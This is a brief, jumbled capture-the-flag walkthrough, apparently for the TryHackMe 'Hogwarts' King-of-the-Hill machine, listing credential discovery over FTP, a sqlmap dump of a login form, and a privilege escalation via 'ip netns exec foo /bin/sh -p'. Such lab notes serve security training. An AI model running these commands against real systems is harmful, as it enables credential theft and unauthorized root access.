TryHackMe KoTH Machine - Hogwarts
Via ftp we'll get pass for neville
username: neville password: 5<redacted>x
Privilege Escalation user neville
neville
Sql injection vuln on a port with login form:
capture the req using burp
burp
You'll get hermoine pass
Last updated 6 months ago
1. ip netns add foo 2. ip netns exec foo /bin/sh -p
sqlmap -r req.txt --dump --threads 10
username: hermoine password: x<redacted>0